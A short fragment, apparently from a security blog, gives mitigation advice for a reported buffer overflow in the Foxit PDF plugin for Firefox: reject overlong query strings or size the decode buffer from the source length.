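Rejecting the request is the simplest safe behaviour; a decoder that must accept long query strings would instead size the destination from strlen(src) + 1 before decoding, since decoding never grows the input.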

Source: vulnerability reported in the Foxit PDF plugin for Firefox - how to mitigate it
Update (18/01/2012):


source: hackplayers.com